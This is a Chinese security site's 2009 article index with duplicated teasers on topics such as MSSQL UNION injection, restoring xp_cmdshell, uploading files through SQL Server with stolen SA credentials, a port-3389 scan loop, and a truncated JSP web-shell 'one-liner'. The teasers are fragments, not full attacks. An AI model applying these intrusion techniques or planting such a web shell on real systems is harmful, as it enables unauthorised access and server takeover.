首页 电脑电脑学堂

电脑学堂

  • 网管宣言:管住我网内的BT下载!
          BT下载以其独特的优势受到广大用户的喜爱,它在下载的同时还为其他用户提供上传,因此下载的人越多,它的速度越快。不过,麻烦也随之而来,如果多...
    2009-6-29 11:00 424
  • 2009年cise/cisp注册信息安全专业人员资质认证考试题/真题(非模拟题)
      以下题目为大概记忆的结果,供大家以后考试参考,看题目大意吧(有些内容也不记得清楚了)。    另外,说下模拟题,参加培训老师都会给5套模拟题,今天看来,那些题很老、不全,而且真实的考试中基本没有的...
    2009-6-29 10:40 709
  • 2009年cise/cisp注册信息安全专业人员资质认证考试题/真题(非模拟题)
      以下题目为大概记忆的结果,供大家以后考试参考,看题目大意吧(有些内容也不记得清楚了)。    另外,说下模拟题,参加培训老师都会给5套模拟题,今天看来,那些题很老、不全,而且真实的考试中基本没有的...
    2009-6-29 10:40 689
  • 再来一黑客挑战赛地址,拿出你的真本事来
      网站地址:    http://www.pcsec.org/game/    感觉这个没有tian6.COM的难度大.    大家可以去锻炼锻炼.呵呵...
    2009-6-29 10:14 412
  • 再来一黑客挑战赛地址,拿出你的真本事来
      网站地址:    http://www.pcsec.org/game/    感觉这个没有tian6.COM的难度大.    大家可以去锻炼锻炼.呵呵...
    2009-6-29 10:14 526
  • MSSQL下用UNION和系统表配合猜表名和字段名深度注入
      这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union...
    2009-6-29 08:55 482
  • MSSQL下用UNION和系统表配合猜表名和字段名深度注入
      这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union...
    2009-6-29 08:55 521
  • 扫描一个网段的所有端口(win2000)
      在win2000下开一个dos窗口,然后执行   for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389   这样...
    2009-6-28 11:09 673
  • 扫描一个网段的所有端口(win2000)
      在win2000下开一个dos窗口,然后执行   for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389   这样...
    2009-6-28 11:09 699
  • 通过SQL SERVER远程上传文件的实现
    我记得有一种黑客工具,在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方服务器上面,并远程执行DOS命令。当时觉得很好奇,当然作为程序员的我觉得很不爽,赶快对SQL SE...
    2009-6-28 10:58 597
  • 通过SQL SERVER远程上传文件的实现
    我记得有一种黑客工具,在得到对方SQL SERVER服务器的SA帐号和密码后竟可以通过它上传文件到对方服务器上面,并远程执行DOS命令。当时觉得很好奇,当然作为程序员的我觉得很不爽,赶快对SQL SE...
    2009-6-28 10:58 435
  • jsp一句话 c/s端
     Kindle's blog 一句话  程序代码<%if(request.getParameter("f")!=null)(new java.io.FileOutputS...
    2009-6-28 10:20 782
  • jsp一句话 c/s端
     Kindle's blog 一句话  程序代码<%if(request.getParameter("f")!=null)(new java.io.FileOutputS...
    2009-6-28 10:20 881
  • 千变万化恢复xp_cmdshell
      在MSSQL中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令,因此大多数对安全比较重视的管理员都会将它删除,即使没有删除也有可能会由于获得...
    2009-6-27 11:06 876
  • 千变万化恢复xp_cmdshell
      在MSSQL中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令,因此大多数对安全比较重视的管理员都会将它删除,即使没有删除也有可能会由于获得...
    2009-6-27 11:06 702
返回顶部